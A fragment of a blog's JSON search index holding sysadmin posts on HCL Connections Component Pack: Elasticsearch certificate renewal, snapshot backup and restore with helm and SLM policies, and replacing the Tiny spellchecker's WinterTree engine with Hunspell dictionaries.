\u0026#39;30098\u0026#39;) Copy the updated elasticsearch-metrics.p12 file from the Deployment Manager to the same location on the WebSphere Application Server nodes. Then restart your WebSphere environment (with Deployment Manager and Node Agents).\n","excerpt":"\u003cp\u003eElasticsearch in HCL Connections Componentpack is secured with Searchguard and needs certificates to work properly. These certificates are generated by \u003ca href=\"https://help.hcltechsw.com/connections/v7/admin/install/cp_install_services_tasks.html?hl=bootstrap#cp_install_services_tasks__section_iqb_24c_qmb\" target=\"_blank\"\u003ebootstrap \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n during the initial container deployment with \u003ccode\u003ehelm\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eThese certificates are valid for 10 years (\u003ccode\u003echain_ca.pem\u003c/code\u003e) or 2 years (\u003ccode\u003eelasticsearch*.pem\u003c/code\u003e) and stored in the Kubernetes secrets \u003ccode\u003eelasticsearch-secret\u003c/code\u003e, \u003ccode\u003eelasticsearch-7-secret\u003c/code\u003e. So when your HCL Connections deployment is running for 2 years, the certficates stop working.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/update-elasticsearch-certificates/","title":"Update Elasticsearch certificates in Componentpack"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/backup/","title":"Backup"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/backup/","title":"Backup"},{"body":"Last week I played around with the HCL Connections documentation to backup Elasticsearch in the article Backup Elasticsearch Indices in Component Pack .\nIn the end I found that I couldn\u0026rsquo;t get the snapshot restored and that I have to run a command outside of my Kubernetes cluster to get a snapshot on a daily basis. That\u0026rsquo;s not what I want.\nSo the first idea was to move the job defined in the helm chart into a Kubernetes cronjob. So I changed the definition to a cronjob. So now I have a job running from Kubernetes.\nI added a new default variable:\ncronTimes: \u0026#34;0 6,18 * * *\u0026#34; So without changing this, when we deploy the cronjob, at 6:00 and 18:00 (or 6am and 6pm) the cronjob runs and creates a snapshot.\nSo what happens if we want to restore a snapshot? When we add the restore script to the same helm chart as our backup script, we have to delete the installation and loose all logs of our backup jobs. The snapshots are still there, but the history is gone.\nSo I created seperate helm charts, first the cronjob to create snapshots and second the job to restore the snapshot. The restore script restores all indices in our snapshot, this fails because some of them are system indices and always open. So the restore fails all the time in my tests.\nThe biggest caveat with the restore script is that it closes all indices. Each index would automatically open again after a successful restore, but the restore fails and so all indices stay closed.\nI tried adding command options to the delivered restore command to only restore the icmetrics*, orient-me-collection and quickresults indices, but the restore script was too limited for me.\nIf you want to use this helm chart, feel free to download:\nesbackup-0.1.0.tgz I\u0026rsquo;m not responsible for your data or give support on these scripts! Use it on your own risk!\nI\u0026rsquo;m not happy with the restore script, so no download for the moment.\nUse Kibana and create a snapshot policy In former Componentpack versions, there was a helm chart to deploy Elasticstack (Kibana, Logstash and Filebeat). This chart is still contained in the Componentpack package, but the image are missing.\nI asked for updated images in a case and got them from HCL support. As far as I know, these helm chart and images are not available on Flexnet until now, but I\u0026rsquo;m confident, that support will send them to you on request.\nIn Kibana we can define policies for automatic snapshots , these can be configured through the web UI and show the http request which is sent to Elasticsearch. So we can configure these snapshots without installing Kibana for now.\nTo create a snapshot in the evening each day:\nOpen a shell in one of the es-client pods: kubectl exec -it -c es-client $(kubectl get pods -l component=elasticsearch7,role=client | awk \u0026#39;/client/{print $1}\u0026#39; | head -n 1 ) -- bash The backup store is mounted into all Elasticsearch pods, so no need to change anything on the deployments or statefulsets. cd /opt/elasticsearch-7.10.1/probe ./sendRequest.sh PUT /_slm/policy/daily-snapshot -H \u0026#39;Content-Type: application/json\u0026#39; -d \u0026#39; { \u0026#34;name\u0026#34;: \u0026#34;\u0026lt;daily-snap-{now/d}\u0026gt;\u0026#34;, \u0026#34;schedule\u0026#34;: \u0026#34;0 31 16 * * ?\u0026#34;, \u0026#34;repository\u0026#34;: \u0026#34;connectionsmetrics\u0026#34;, \u0026#34;config\u0026#34;: { \u0026#34;indices\u0026#34;: [ \u0026#34;ic*\u0026#34;, \u0026#34;quickresults\u0026#34;, \u0026#34;orient-me-collection\u0026#34; ], \u0026#34;ignore_unavailable\u0026#34;: true }, \u0026#34;retention\u0026#34;: { \u0026#34;expire_after\u0026#34;: \u0026#34;3d\u0026#34;, \u0026#34;min_count\u0026#34;: 3, \u0026#34;max_count\u0026#34;: 5 } } \u0026#39; This will create a scheduled snapshot of the configured indices (ic*, quickresults and orient-me-collection), at 16:31 UTC (the leading zero are the seconds). And keep 3 snapshots as a minimum. So retention and automatically delete snapshots after the configured time.\nElasticsearch cron expressions Elasticsearch snapshots are automatically deduplicated!\nSnapshots are automatically deduplicated to save storage space and reduce network transfer costs. To back up an index, a snapshot makes a copy of the index’s segments and stores them in the snapshot repository. Since segments are immutable, the snapshot only needs to copy any new segments created since the repository’s last snapshot.\nEach snapshot is also logically independent. When you delete a snapshot, Elasticsearch only deletes the segments used exclusively by that snapshot. Elasticsearch doesn’t delete segments used by other snapshots in the repository.\nElasticsearch: Snapshot and restore So no waste of diskspace if you add more snapshots. I play around with hourly snapshots at the moment:\ncd /opt/elasticsearch-7.10.1/probe ./sendRequest.sh PUT /_slm/policy/hourly-snapshot -H \u0026#39;Content-Type: application/json\u0026#39; -d \u0026#39; { \u0026#34;name\u0026#34;: \u0026#34;\u0026lt;hourly-snap-{now/d}\u0026gt;\u0026#34;, \u0026#34;schedule\u0026#34;: \u0026#34;0 0 * * * ?\u0026#34;, \u0026#34;repository\u0026#34;: \u0026#34;connectionsmetrics\u0026#34;, \u0026#34;config\u0026#34;: { \u0026#34;indices\u0026#34;: [ \u0026#34;ic*\u0026#34;, \u0026#34;quickresults\u0026#34;, \u0026#34;orient-me-collection\u0026#34; ], \u0026#34;ignore_unavailable\u0026#34;: true }, \u0026#34;retention\u0026#34;: { \u0026#34;expire_after\u0026#34;: \u0026#34;1d\u0026#34;, \u0026#34;min_count\u0026#34;: 6, \u0026#34;max_count\u0026#34;: 12 } } \u0026#39; This can be set with Kibana, but no need to deploy it, if you don\u0026rsquo;t need it. You can use the curl calls above to configure the snapshots.\n","excerpt":"\u003cp\u003eLast week I played around with the \u003ca href=\"https://help.hcltechsw.com/connections/v7/admin/admin/cp_config_es_backup_restore_data.html\" target=\"_blank\"\u003eHCL Connections documentation to backup Elasticsearch \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in the article \u003ca href=\"/posts/2022/backup-elasticsearch-indices\"\u003eBackup Elasticsearch Indices in Component Pack\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eIn the end I found that I couldn\u0026rsquo;t get the snapshot restored and that I have to run a command outside of my Kubernetes cluster to get a snapshot on a daily basis. That\u0026rsquo;s not what I want.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/backup-elasticsearch-indices-cronjob/","title":"How to get regular snapshots with Elasticsearch"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/metrics/","title":"Metrics"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/snapshot/","title":"Snapshot"},{"body":"During a migration from Cognos Metrics to Elasticsearch Metrics, I had some issues with the index. So I wanted to create a backup of the already migrated data and start over from scratch.\nThe official documentation has an article on the topic: Backing up and restoring data for Elasticsearch-based components , but I had to slightly adjust the commands to get a successful snapshot.\nThe documentation shows commands only for Elasticsearch 5, with Connections 7 you have the option to switch to Elasticsearch 7, then all pod names get an additional -7 in the name!\nDuring the deeper analysis of the backup and restore scripts, I found that I have to change the helm chart, so I will show the process for Elasticsearch 5 \u0026amp; 7.\nRequirement helm 3 and connections as default namespace!\nSet default namespace for kubectl I don\u0026rsquo;t want to type -n connections over and over again with each kubectl command, so I set connections as a default:\nkubectl config set-context --current --namespace=connections Register snapshot repository Run this on your Kubernetes master or a machine configured for accessing the Kubernetes cluster with kubectl.\nOpen a shell in one o the es-client pods (works for ES 5 and 7):\nkubectl exec -ti -n connections $(kubectl get pods -n connections |grep es-client |awk \u0026#39;{print $1}\u0026#39; |head -n 1) -- bash The documentation tells us, that the default for the snapshot name is connectionsbackup, but the doBackup.sh script in /opt/elasticsearch-5.5.1/probe (in version 6.0) uses connectionsmetrics to create a snapshot, newer versions define the default repository in the helm chart values.yaml and it is still connectionsmetrics. Using the documented default will end in an error.\nRun the following commands in the container shell:\ncd /opt/elasticsearch-${ES_VERSION}/probe/ ./sendRequest.sh PUT /_snapshot/connectionsmetrics \\ -H \u0026#39;Content-Type: application/json\u0026#39; \\ -d \u0026#39;{\u0026#34;type\u0026#34;: \u0026#34;fs\u0026#34;,\u0026#34;settings\u0026#34;: {\u0026#34;compress\u0026#34;: true,\u0026#34;location\u0026#34;: \u0026#34;/backup\u0026#34;}}\u0026#39; Response from server:\n{ \u0026#34;acknowledged\u0026#34;: true } Check the settings of the backup repository:\n./sendRequest.sh GET /_snapshot/_all?pretty Response from server:\n{ \u0026#34;connectionsmetrics\u0026#34;: { \u0026#34;type\u0026#34;: \u0026#34;fs\u0026#34;, \u0026#34;settings\u0026#34;: { \u0026#34;compress\u0026#34;: \u0026#34;true\u0026#34;, \u0026#34;location\u0026#34;: \u0026#34;/backup\u0026#34; } } } You can keep the container shell open, we will need it a little bit later again.\nGet image tag and registry Run this on your Kubernetes master or a machine configured for accessing the Kubernetes cluster with kubectl.\nWe have to use different commands for version 5 and 7, so I ran a short script to find out the deployed version, or just use es-data for version 5 and es-data-7 for version 7.\nif [ $(kubectl get pods | grep es-data | head -n 1 | awk -F\u0026#39;-\u0026#39; \u0026#39;$3 == \u0026#34;7\u0026#34; {print $3}\u0026#39;) -eq \u0026#34;7\u0026#34; ] then version=-7 elasticVersion=7 else version= elasticVersion=5 fi You should see something similar to the following output:\nestag=$(kubectl get statefulset es-data${version} -o=jsonpath=\u0026#39;{$.spec.template.spec.containers[:1].image}\u0026#39; | awk -F: \u0026#39;{print $3}\u0026#39;) registry=$(kubectl get statefulset es-data${version} -o=jsonpath=\u0026#39;{$.spec.template.spec.containers[:1].image}\u0026#39; | awk -F/ \u0026#39;{print $1}\u0026#39;) echo $estag 20180503-104412 echo $registry cnx7-rh8-cp.stoeps.home:5000 helm chart for backup and restore I tried to use the helm chart delivered with Componentpack, but in the template files the path for version 5.5 is hard coded, the namespace is missing for the used image and I wanted to use the chart for version 7 and 5 of Elasticsearch.\nSo I rewrote the provided files, added the missing variables and if-else conditions. You can download the adjusted chart , I changed the name to esbackuprestore-0.1.1.tgz, so you can keep it in the same folder as the orginal file (esbackuprestore-0.1.0.tgz).\nCreate snapshot Delete esbackuprestore helm deployment If you already have used the helm chart, you need to delete esbackuprestore to run the install commands again.\nCheck if the chart is already installed:\nhelm list | grep esbackuprestore If it is already deployed, the command returns:\nesbackuprestore connections\t1 2022-07-29 20:17:06.456765299 +0000 UTC\tfailed esbackuprestore-0.1.1 Then delete it:\nhelm delete esbackuprestore -n connections No matter if you get an error here, I assume you never created an Elasticsearch backup within Componentpack.\nCreate snapshot cd extractedFolder/microservices_connections/hybridcloud/helmbuilds/ helm install esbackuprestore esbackuprestore-0.1.1.tgz \\ --set image.tag=$estag,elasticSearchBackup=true,image.repository=$registry,elasticVersion=$elasticVersion To make more snapshots just run the command to delete and install again.\nI get an error message, that the job is already deployed, but the snapshot is created. I will check the root cause, but actually the job runs and creates snapshots.\nRestore snapshot First we need to find out the snapshot name. To make this a little bit easier, download and install jq or gron . I prefer gron, the syntax is easier and you can grep within the results.\nGet snapshot name with gron # Version 5 kubectl exec -ti -n connections -c es-client \\ $(kubectl get pods -n connections | grep es-client | awk \u0026#39;{print $1}\u0026#39; | head -n 1) \\ -- /opt/elasticsearch-5.5.1/probe//sendRequest.sh GET /_snapshot/connectionsmetrics/_all \\ | grep snapshots | gron | grep \u0026#34;snapshot =\u0026#34; # Version 7 kubectl exec -ti -n connections -c es-client \\ $(kubectl get pods -n connections |grep es-client |awk \u0026#39;{print $1}\u0026#39; |head -n 1) \\ -- /opt/elasticsearch-7.10.1/probe//sendRequest.sh GET /_snapshot/connectionsmetrics/_all \\ | grep snapshots | gron | grep \u0026#34;snapshot =\u0026#34; Result:\njson.snapshots[0].snapshot = \u0026#34;snapshot20220729182836\u0026#34;; json.snapshots[1].snapshot = \u0026#34;snapshot20220729183056\u0026#34;; json.snapshots[2].snapshot = \u0026#34;snapshot20220729183246\u0026#34;; Get snapshot name with jq # Version 5 kubectl exec -ti -n connections -c es-client \\ $(kubectl get pods -n connections |grep es-client |awk \u0026#39;{print $1}\u0026#39; |head -n 1) \\ -- /opt/elasticsearch-5.5.1/probe/sendRequest.sh GET /_snapshot/connectionsmetrics/_all \\ | grep snapshots | jq \u0026#39;.snapshots[] | .snapshot\u0026#39; # Version 7 kubectl exec -ti -n connections -c es-client \\ $(kubectl get pods -n connections |grep es-client |awk \u0026#39;{print $1}\u0026#39; |head -n 1) \\ -- /opt/elasticsearch-7.10.1/probe/sendRequest.sh GET /_snapshot/connectionsmetrics/_all \\ | grep snapshots | jq \u0026#39;.snapshots[] | .snapshot\u0026#39; Result:\n\u0026#34;snapshot20220729182836\u0026#34; \u0026#34;snapshot20220729183056\u0026#34; \u0026#34;snapshot20220729183246\u0026#34; Restore command Adding | tail -n 1 to the get name commands, shows the last created snapshot, copy the name and use with helm. Before running the helm command to need again delete the esbackuprestore application.\nWith the restore command we need REPONAME (Default: connectionsmetrics) and SNAPSHOTNAME.\nhelm delete esbackuprestore helm install esbackuprestore esbackuprestore-0.1.1.tgz \\ --set image.tag=$estag,elasticSearchRestore=true,image.repository=$registry,namespace=connections,/ SNAPSHOTNAME=snapshot20220729183246,REPONAME=connectionsmetrics Delete snapshots The documentation does not tell us how to delete snapshots, I have no experience how large they get, so if you ever have to remove older snapshots, open a shell in one of the es-data pods and run the command:\n/opt/elasticsearch-${ES_VERSION}/probe/sendRequest.sh DELETE /_snapshot/connectionsmetrics/snapshotname-to-delete Do not use restore at the moment!!! I tested the restore and it fails, because one of the indices is open and can\u0026rsquo;t be restored.\nProblem here is, that the doRestore.sh closes all indices, when it is started, but only opens them when the restore is successful.\nSo the whole process with these charts (mine, or the original one from HCL) can\u0026rsquo;t be recommended at the moment.\nI think the backup is important, because Snapshot and restore tells us:\nTaking a snapshot is the only reliable and supported way to back up a cluster. You cannot back up an Elasticsearch cluster by making copies of the data directories of its nodes. There are no supported methods to restore any data from a filesystem-level backup.\nElasticsearch is used to store Metrics and typeahead data, no content, but still valid data for us and our users.\nNow we need to find a way to get a reliable way to restore these snapshots, if this is done, I will work on a way to backup mongoDB. The mongoDB is used with Activities Plus and afaik with Orient Me, but documentation does not show a way to backup.\n","excerpt":"\u003cp\u003eDuring a migration from Cognos Metrics to Elasticsearch Metrics, I had some issues with the index. So I wanted to create a backup of the already migrated data and start over from scratch.\u003c/p\u003e\n\u003cp\u003eThe official documentation has an article on the topic: \u003ca href=\"https://help.hcltechsw.com/connections/v7/admin/admin/cp_config_es_backup_restore_data.html\" target=\"_blank\"\u003eBacking up and restoring data for Elasticsearch-based components \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, but I had to slightly adjust the commands to get a successful snapshot.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/backup-elasticsearch-indices/","title":"Backup Elasticsearch Indices in Component Pack"},{"body":"In the last few years, I have had issues with application servers using a large amount of CPU and even hanging application servers running the Tiny Spellchecking service. It ended with disabled spellchecking in the Tiny Editors\u0026rsquo; config.js.\nSharedDirectory/customization/javascript/tiny/editors/connections/config.js\n... // Set to false to disable Tiny\u0026#39;s spell checking service in TinyMCE and Textbox.io. spellingServiceEnabled: false, ... I worked with HCL and Tiny Support on these issues, and they provided updates during the last year. This should have been fixed since TinyMCE 5.9.\nNow, after updating to the actual editor version, TinyMCE 5.10.2, we decided to re-enable the spellchecker, and for the first few days it looked like the issue was really resolved. Sadly, after about a week, the first application server started to use 800% CPU just for the server hosting the spelling service.\nIn the application server logs, we found messages like:\nSystemOut.log of the application server running spellchecking service So first, we see debug messages without enabling a trace, and on the top of the image, we see that a request ran over 1000 ms.\nSupport sent me the steps to disable the debug messages:\nCreate a file called /opt/ephox/logback.xml 1 2 3 4 5 6 7 8 9 10 11 12 13 \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;UTF-8\u0026#34;?\u0026gt; \u0026lt;configuration\u0026gt; \u0026lt;appender name=\u0026#34;CONSOLE\u0026#34; class=\u0026#34;ch.qos.logback.core.ConsoleAppender\u0026#34;\u0026gt; \u0026lt;target\u0026gt;System.out\u0026lt;/target\u0026gt; \u0026lt;encoder\u0026gt; \u0026lt;pattern\u0026gt;%date{yyyy-MM-dd HH:mm:ss.SSSX} [%thread] %-5level %logger{36} - %msg%n\u0026lt;/pattern\u0026gt; \u0026lt;/encoder\u0026gt; \u0026lt;/appender\u0026gt; \u0026lt;logger name=\u0026#34;ironbark\u0026#34; level=\u0026#34;WARN\u0026#34;/\u0026gt; \u0026lt;root level=\u0026#34;INFO\u0026#34;\u0026gt; \u0026lt;appender-ref ref=\u0026#34;CONSOLE\u0026#34;/\u0026gt; \u0026lt;/root\u0026gt; \u0026lt;/configuration\u0026gt; Important is line 9, which is set to DEBUG for TinyMCE 5.10.2, but WARN or ERROR will prevent these log messages.\nAdd a custom JVM property (Server \u0026gt; Server Types \u0026gt; WebSphere Application Servers → server name \u0026gt; Process Definition \u0026gt; Java Virtual Machine \u0026gt; Custom Properties) to the application server where you installed the spellchecker. logback.configurationFile: /opt/ephox/logback.xml After this, the performance was slightly better, but still not good.\nToday, I got the following update from Tiny:\nBroadly, we believe that WinterTree spelling library is having problems with long words with possible hyphens, especially in German. In this case, we recommending trying the Hunspell library instead.\nWe can see that the problem language is always German, and the number of characters is higher than 20. Due to implementation aspects with how WinterTree\u0026rsquo;s spelling engine works, these cases can be particularly problematic.\nThe most egregious offender is:\nTook 25270 milliseconds.\nWhich meant that it took over 25 seconds to generate suggestions for 1 word in a document. As you can imagine, when this starts happening, sending lots of words becomes a problem. However, there aren\u0026rsquo;t many words that take more than 1 second to generate, because this is the entire list in the logs sent to us.\nIn general, you could likely avoid this behavior by using Hunspell libraries, particularly for German. Here is our documentation about adding Hunspell dictionaries to Spellchecker Pro. You likely have specific separate instructions for setting up Hunspell, but it will be effectively the same under the hood, as it\u0026rsquo;s a server-only setting.\nhttps://www.tiny.cloud/docs/tinymce/6/self-hosting-hunspell/ Tiny/HCL Support So here I could stop and point you to support, but I have had some issues during the activation of Hunspell so far.\nFirst, the webpage says, “Tiny provides two downloadable bundles of Hunspell dictionaries,” which I couldn’t find. So I searched for other download options. The best match were the dictionaries included with LibreOffice : https://github.com/libreoffice/dictionaries , but the folder structure and naming do not match the one requested by Tiny.\n#!/usr/bin/env bash git clone https://github.com/LibreOffice/dictionaries.git /tmp/dictionaries for i in af_ZA da de_DE en_AU en_CA en_GB en_US es fr hu it_IT nb_NO nl_NL nn pl pt_BR pt_PT sv_FI sv_SE ; do mkdir -p /opt/ephox/hunspell-dictionaries/$i find /tmp/dictionaries -iname $i*.aff -exec cp {} /opt/ephox/hunspell-dictionaries/$i/$i.aff \\; find /tmp/dictionaries -iname $i*.dic -exec cp {} /opt/ephox/hunspell-dictionaries/$i/$i.dic \\; done This script creates the expected folder structure and copies the dictionaries to the right place.\ntree /opt/ephox/hunspell-dictionaries/ /opt/ephox/hunspell-dictionaries/ ├── af_ZA │ ├── af_ZA.aff │ └── af_ZA.dic ├── da │ ├── da.aff │ └── da.dic ├── de_DE │ ├── de_DE.aff │ └── de_DE.dic ├── en_AU │ ├── en_AU.aff │ └── en_AU.dic ├── en_CA │ ├── en_CA.aff │ └── en_CA.dic ├── en_GB │ ├── en_GB.aff │ └── en_GB.dic ├── en_US │ ├── en_US.aff │ └── en_US.dic ├── es │ ├── es.aff │ └── es.dic ├── fr │ ├── fr.aff │ └── fr.dic ├── hu │ ├── hu.aff │ └── hu.dic ├── it_IT │ ├── it_IT.aff │ └── it_IT.dic ├── nb_NO │ ├── nb_NO.aff │ └── nb_NO.dic ├── nl_NL │ ├── nl_NL.aff │ └── nl_NL.dic ├── nn │ ├── nn.aff │ └── nn.dic ├── pl │ ├── pl.aff │ └── pl.dic ├── pt_BR │ ├── pt_BR.aff │ └── pt_BR.dic ├── pt_PT │ ├── pt_PT.aff │ └── pt_PT.dic ├── sv_FI │ ├── sv_FI.aff │ └── sv_FI.dic └── sv_SE ├── sv_SE.aff └── sv_SE.dic 19 directories, 38 files Now we have to enable the Hunspell-dictionaries in /opt/ephox/application.conf and restart the spellchecking service.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 cat /opt/ephox/application.conf ephox { allowed-origins { origins = [ \u0026#34;http://cnx7-rh8-was.stoeps.home\u0026#34;, \u0026#34;https://cnx7-rh8-was.stoeps.home\u0026#34;, \u0026#34;https://cnx7-rh8.stoeps.home\u0026#34;, \u0026#34;http://cnx7-rh8-was.stoeps.home:9081\u0026#34;, \u0026#34;https://cnx7-rh8-was.stoeps.home:9444\u0026#34; ] } spelling { hunspell-dictionaries-path = \u0026#34;/opt/ephox/hunspell-dictionaries\u0026#34; } } Don\u0026rsquo;t forget to enable spell checking in SharedDirectory/customization/javascript/tiny/editors/connections/config.js\n... // Set to false to disable Tiny\u0026#39;s spell checking service in TinyMCE and Textbox.io. spellingServiceEnabled: true, ... Results I tested with WinterTree (default) and Hunspell.\nTesting some long words with WinterTree Here we see the first long word underlined red, this generated the log message that the request needed longer than 1000ms [7/12/22 17:35:35:152 UTC] 00000132 SystemOut O 2022-07-12 17:35:35.152Z [ioapp-compute-1] INFO ironbark - request [ uuid-47ac0625-f6dc-4876-8127-59b50595cd0f ] Response =\u0026gt; Status: 200 OK (12 ms) [7/12/22 17:35:35:212 UTC] 00000139 SystemOut O 2022-07-12 17:35:35.212Z [ioapp-compute-4] DEBUG ironbark - request [ uuid-ac3ac5bf-eb12-4e72-a98b-a9c93f288093 ] Spellall (100.0 % - 1 / 1 incorrect) [7/12/22 17:35:35:212 UTC] 00000139 SystemOut O 2022-07-12 17:35:35.212Z [ioapp-compute-4] DEBUG ironbark - request [ uuid-ac3ac5bf-eb12-4e72-a98b-a9c93f288093 ] Spellall (1 words) (BEGIN) [7/12/22 17:35:38:865 UTC] 00000139 SystemOut O 2022-07-12 17:35:38.865Z [ioapp-compute-4] WARN ironbark - request [ uuid-ac3ac5bf-eb12-4e72-a98b-a9c93f288093 ] PERFORMANCE_ALERT: word took longer than 1000 milliseconds. Took 3652 milliseconds. * Language: de * Number of characters: 48 * Number of hyphens: 0 * Number of apostrophes: 0 * Number of suggestions generated: 16 [7/12/22 17:35:38:865 UTC] 00000139 SystemOut O 2022-07-12 17:35:38.865Z [ioapp-compute-4] DEBUG ironbark - request [ uuid-ac3ac5bf-eb12-4e72-a98b-a9c93f288093 ] Spellall (1 words) (END) [7/12/22 17:35:38:866 UTC] 00000139 SystemOut O 2022-07-12 17:35:38.866Z [ioapp-compute-4] INFO ironbark - request [ uuid-9347efc7-7705-4bcb-911c-1506d1d3b90a ] Response =\u0026gt; Status: 200 OK (3726 ms) We see the request needs 3.6 seconds and the word was 48 characters long.\nTesting the same with Hunspell enabled Here the result appeared faster and no warning message is logged. [7/12/22 20:10:12:798 UTC] 00000134 SystemOut O 2022-07-12 20:10:12.798Z [ioapp-compute-4] DEBUG ironbark - request [ uuid-0958072a-bf4c-4cb6-8acd-e2e7e8fb2870 ] Spellall (7 words) (BEGIN) [7/12/22 20:10:12:798 UTC] 00000134 SystemOut O 2022-07-12 20:10:12.798Z [ioapp-compute-4] DEBUG ironbark - request [ uuid-0958072a-bf4c-4cb6-8acd-e2e7e8fb2870 ] Spellall (7 words) (END) [7/12/22 20:10:12:800 UTC] 00000132 SystemOut O 2022-07-12 20:10:12.800Z [ioapp-compute-2] DEBUG ironbark - request [ uuid-199c0261-36e8-4173-807a-13a4a8ebce6b ] Spellall (0.0 % - 0 / 1 incorrect) [7/12/22 20:10:12:801 UTC] 00000132 SystemOut O 2022-07-12 20:10:12.800Z [ioapp-compute-2] DEBUG ironbark - request [ uuid-199c0261-36e8-4173-807a-13a4a8ebce6b ] Spellall (1 words) (BEGIN) [7/12/22 20:10:12:801 UTC] 00000132 SystemOut O 2022-07-12 20:10:12.801Z [ioapp-compute-2] DEBUG ironbark - request [ uuid-199c0261-36e8-4173-807a-13a4a8ebce6b ] Spellall (1 words) (END) [7/12/22 20:10:12:801 UTC] 00000134 SystemOut O 2022-07-12 20:10:12.801Z [ioapp-compute-4] INFO ironbark - request [ uuid-4655f8a9-a466-4ad4-8874-d91f5fc8fc9b ] Response =\u0026gt; Status: 200 OK (18 ms) [7/12/22 20:10:12:801 UTC] 0000012f SystemOut O 2022-07-12 20:10:12.801Z [ioapp-compute-1] INFO ironbark - request [ uuid-9117e582-90f5-4246-bd17-56d00c12b975 ] Request =\u0026gt; POST /tiny-spelling/2/suggestions [7/12/22 20:10:12:803 UTC] 00000132 SystemOut O 2022-07-12 20:10:12.803Z [ioapp-compute-2] INFO ironbark - request [ uuid-938f2c71-701b-4312-9183-426b81829297 ] Response =\u0026gt; Status: 200 OK (16 ms) [7/12/22 20:10:12:803 UTC] 00000133 SystemOut O 2022-07-12 20:10:12.803Z [ioapp-compute-3] INFO ironbark - request [ uuid-67b5ef69-2079-43eb-908f-bd0017f715e2 ] Request =\u0026gt; POST /tiny-spelling/2/suggestions [7/12/22 20:10:12:808 UTC] 0000012f SystemOut O 2022-07-12 20:10:12.808Z [ioapp-compute-1] DEBUG ironbark - request [ uuid-202c5596-0fae-4cc4-8793-7feb458b3b0c ] Incoming suggestions-V2 request for: 1 word(s) in language: de from API Key: none [7/12/22 20:10:12:811 UTC] 0000012f SystemOut O 2022-07-12 20:10:12.811Z [ioapp-compute-1] DEBUG ironbark - request [ uuid-202c5596-0fae-4cc4-8793-7feb458b3b0c ] Spellall (0.0 % - 0 / 1 incorrect) [7/12/22 20:10:12:811 UTC] 0000012f SystemOut O 2022-07-12 20:10:12.811Z [ioapp-compute-1] DEBUG ironbark - request [ uuid-202c5596-0fae-4cc4-8793-7feb458b3b0c ] Spellall (1 words) (BEGIN) [7/12/22 20:10:12:812 UTC] 0000012f SystemOut O 2022-07-12 20:10:12.811Z [ioapp-compute-1] DEBUG ironbark - request [ uuid-202c5596-0fae-4cc4-8793-7feb458b3b0c ] Spellall (1 words) (END) [7/12/22 20:10:12:814 UTC] 0000012f SystemOut O 2022-07-12 20:10:12.814Z [ioapp-compute-1] INFO ironbark - request [ uuid-9117e582-90f5-4246-bd17-56d00c12b975 ] Response =\u0026gt; Status: 200 OK (13 ms) [7/12/22 20:10:12:817 UTC] 00000132 SystemOut O 2022-07-12 20:10:12.817Z [ioapp-compute-2] DEBUG ironbark - request [ uuid-8f7cc6c4-60f7-4535-ad4a-04a49aa4b389 ] Incoming suggestions-V2 request for: 1 word(s) in language: de from API Key: none [7/12/22 20:10:12:819 UTC] 00000132 SystemOut O 2022-07-12 20:10:12.819Z [ioapp-compute-2] DEBUG ironbark - request [ uuid-8f7cc6c4-60f7-4535-ad4a-04a49aa4b389 ] Spellall (0.0 % - 0 / 1 incorrect) [7/12/22 20:10:12:819 UTC] 00000132 SystemOut O 2022-07-12 20:10:12.819Z [ioapp-compute-2] DEBUG ironbark - request [ uuid-8f7cc6c4-60f7-4535-ad4a-04a49aa4b389 ] Spellall (1 words) (BEGIN) [7/12/22 20:10:12:819 UTC] 00000132 SystemOut O 2022-07-12 20:10:12.819Z [ioapp-compute-2] DEBUG ironbark - request [ uuid-8f7cc6c4-60f7-4535-ad4a-04a49aa4b389 ] Spellall (1 words) (END) [7/12/22 20:10:12:822 UTC] 00000132 SystemOut O 2022-07-12 20:10:12.821Z [ioapp-compute-2] INFO ironbark - request [ uuid-67b5ef69-2079-43eb-908f-bd0017f715e2 ] Response =\u0026gt; Status: 200 OK (18 ms) [7/12/22 20:10:12:854 UTC] 00000133 SystemOut O 2022-07-12 20:10:12.854Z [ioapp-compute-3] INFO ironbark - request [ uuid-0b4d740e-a06b-4a1a-a75e-e6a680a2d41d ] Request =\u0026gt; POST /tiny-spelling/2/suggestions [7/12/22 20:10:12:860 UTC] 00000135 SystemOut O 2022-07-12 20:10:12.860Z [ioapp-compute-5] DEBUG ironbark - request [ uuid-15c6b13d-a3f7-4fbb-8b43-6bf6a6074b26 ] Incoming suggestions-V2 request for: 1 word(s) in language: de from API Key: none [7/12/22 20:10:12:862 UTC] 00000135 SystemOut O 2022-07-12 20:10:12.862Z [ioapp-compute-5] DEBUG ironbark - request [ uuid-15c6b13d-a3f7-4fbb-8b43-6bf6a6074b26 ] Spellall (0.0 % - 0 / 1 incorrect) [7/12/22 20:10:12:862 UTC] 00000135 SystemOut O 2022-07-12 20:10:12.862Z [ioapp-compute-5] DEBUG ironbark - request [ uuid-15c6b13d-a3f7-4fbb-8b43-6bf6a6074b26 ] Spellall (1 words) (BEGIN) [7/12/22 20:10:12:862 UTC] 00000135 SystemOut O 2022-07-12 20:10:12.862Z [ioapp-compute-5] DEBUG ironbark - request [ uuid-15c6b13d-a3f7-4fbb-8b43-6bf6a6074b26 ] Spellall (1 words) (END) [7/12/22 20:10:12:864 UTC] 00000135 SystemOut O 2022-07-12 20:10:12.864Z [ioapp-compute-5] INFO ironbark - request [ uuid-0b4d740e-a06b-4a1a-a75e-e6a680a2d41d ] Response =\u0026gt; Status: 200 OK (10 ms) So for German spellchecking, it appears that Hunspell is working faster and giving suggestions even for long words. No, high CPU or waiting message has appeared so far. I never thought about these long German words until I read the answer from Tiny Support. When your users write documents in Connections in German, I would suggest you change the spellchecker too.\n","excerpt":"\u003cp\u003eIn the last few years, I have had issues with application servers using a large amount of CPU and even hanging application servers running the Tiny Spellchecking service. It ended with disabled spellchecking in 